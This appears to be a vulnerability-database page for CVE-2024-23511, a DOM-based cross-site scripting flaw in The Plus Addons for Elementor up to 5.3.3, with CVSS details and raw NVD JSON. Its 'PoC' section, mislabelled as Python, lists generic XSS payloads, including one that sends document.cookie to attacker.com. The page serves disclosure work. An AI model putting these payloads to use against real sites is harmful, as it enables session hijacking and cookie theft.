Security Vulnerability Report
中文
CVE-2024-23511 CVSS 6.5 MEDIUM

CVE-2024-23511

Published: 2026-01-05 14:15:53
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in POSIMYTH The Plus Addons for Elementor Page Builder Lite allows DOM-Based XSS.This issue affects The Plus Addons for Elementor Page Builder Lite: from n/a through 5.3.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

The Plus Addons for Elementor Page Builder Lite <= 5.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2024-23511 PoC - DOM-based XSS in The Plus Addons for Elementor --> <!-- Example payload to demonstrate the XSS vulnerability --> <script>alert(document.cookie)</script> <!-- Real-world attack example --> <!-- Inject into vulnerable parameter/field --> <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> <!-- Common attack vectors --> <!-- 1. Via URL parameter --> <!-- https://victim.com/page?param=<script>malicious_code</script> --> <!-- 2. Via form input --> <!-- Input field value: "><script>alert('XSS')</script> --> <!-- 3. Via stored content --> <!-- Plugin saves unsanitized user input to database --> <!-- When page renders, XSS payload executes -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-23511", "sourceIdentifier": "[email protected]", "published": "2026-01-05T14:15:52.977", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in POSIMYTH The Plus Addons for Elementor Page Builder Lite allows DOM-Based XSS.This issue affects The Plus Addons for Elementor Page Builder Lite: from n/a through 5.3.3."}, {"lang": "es", "value": "Neutralización inadecuada de la entrada durante la generación de páginas web (XSS o 'cross-site scripting') vulnerabilidad en POSIMYTH The Plus Addons for Elementor Page Builder Lite permite XSS basado en DOM. Este problema afecta a The Plus Addons for Elementor Page Builder Lite: desde n/d hasta 5.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/the-plus-addons-for-elementor-page-builder/vulnerability/wordpress-the-plus-addons-for-elementor-plugin-5-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}